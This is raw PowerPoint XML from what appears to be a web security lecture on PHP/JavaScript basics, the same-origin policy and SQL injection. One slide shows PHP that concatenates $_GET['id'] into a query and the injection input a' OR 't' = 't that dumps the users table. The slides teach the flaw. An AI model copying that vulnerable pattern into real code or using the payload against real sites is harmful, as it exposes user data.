              <a:t>($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>while ($result=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_fetch_row</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>query_result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)) {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  echo ‘&lt;table&gt;’;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       echo ‘&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;’;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           echo ‘&lt;td width=“100px”&gt;’.$result[0].’&lt;/td&gt;’;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           echo ‘&lt;td width=“100px”&gt;’.$result[1].’&lt;/td&gt;’;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           echo ‘&lt;td width=“100px”&gt;’.$result[2].’&lt;/td&gt;’;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       echo ‘&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;’;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  echo ‘&lt;/table&gt;’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?&gt;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Web Applications: Client-Side Script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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文字方塊 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000132" y="1142984"/>
            <a:ext cx="7000892" cy="535785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altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;head&gt;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  &lt;title&gt;Example 2&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;script type=‘text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’&gt;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      function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>submit_form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(){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          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          if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user_account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’).value!=“”){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               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>project_form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’).submit();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          }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        }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  &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;body&gt;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  &lt;form id=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>project_form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’ action=‘my_project.php’ method=‘POST’&gt;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      &lt;input type=‘text’ name=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user_account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’ id=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user_account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’ /&gt;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      &lt;input type=‘button’  value=‘OK’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>submit_form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>();’ /&gt;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      &lt;input type=‘reset’ value=‘Reset’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/&gt;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  &lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean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Same-Origin Policy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The policy permits scripts running on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pages originating from the same site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> to access each other's DOM with no specific restrictions, but prevents access to DOM on different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>sites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Without this, scripts from a malicious site can easily steal another site’s session cookies.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>There </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>are relaxes, corner cases, and exceptions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The same-origin policy also applies to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>XMLHttpRequests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> unless the server provides an Access-Control-Allow-Origin (CORS) header.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>WebSockets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> subject to the same-origin policy.</a:t>
            </a:r>
          </a:p>
          <a:p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Vulnerable Web Applications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Web applications are supposed to be secure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Unfortunately, many of them do go wrong, having </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>may be exploited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> by the attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Most security vulnerabilities are a result of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bad programming practices </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> programming errors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The possible damages:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Your personal data get stolen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Your website gets infected or sabotaged.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>These may bare financial or legal consequences.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 Common Vulnerability: SQL Injection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 smtClean="0"/>
              <a:t>User’s inputs are used as parts of an SQL query, without being checked/validated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Attackers may </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> the vulnerability to read, update, create, or delete arbitrary data in the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Example (display all users’ information):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Relevant code in a vulnerable application:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The attacker types in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a’ OR ‘t’ = ‘t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>as the input for id.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The actual query executed:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>So, the attacker gets to see every row from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1214414" y="3929066"/>
            <a:ext cx="6357982" cy="35719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$</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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sql</a:t>
            </a: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 = “SELECT * FROM users WHERE id = ‘” . </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>$_GET[‘id’] </a:t>
            </a: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. “’”;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1214414" y="5214950"/>
            <a:ext cx="6357982" cy="35719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SELECT * FROM users WHERE id = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>a’ OR ‘t’ = ‘t</a:t>
            </a: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’;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SQL Injection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zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="群組 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="413268" y="1243415"/>
            <a:ext cx="8339882" cy="5301563"/>
            <a:chOff x="413268" y="1243413"/>
            <a:chExt cx="8339882" cy="5301563"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Text Box 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1958608" y="6206422"/>
              <a:ext cx="2149691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600" b="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>message User </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>aware of</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p: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413268" y="1245651"/>
              <a:ext cx="1108348" cy="496701"/>
            </a:xfrm>
            <a:prstGeom prst="rect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dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ttacker</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Line 24"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4739158" y="6371718"/>
              <a:ext cx="656794" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="E46C0A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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Line 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1160268" y="6358229"/>
              <a:ext cx="656794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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Text Box 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5478057" y="6204942"/>
              <a:ext cx="3275093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600" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>message User unaware of</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rectangle 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="703063" y="6260298"/>
              <a:ext cx="7655151" cy="242456"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="sq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kumimoji="0" lang="zh-TW" altLang="en-US">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4014144" y="1243413"/>
              <a:ext cx="1108348" cy="496701"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="0000FF">
                    <a:shade val="30000"/>
                    <a:satMod val="115000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="0000FF">
                    <a:shade val="67500"/>
                    <a:satMod val="115000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="0000FF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dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>User</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7613340" y="1247515"/>
              <a:ext cx="1108348" cy="496701"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="0000FF">
                    <a:shade val="30000"/>
                    <a:satMod val="115000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="0000FF">
                    <a:shade val="67500"/>
                    <a:satMod val="115000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="0000FF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dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>V</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ulnerable</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Website</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="直線接點 14"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="-1255422" y="3956362"/>
              <a:ext cx="4429156" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
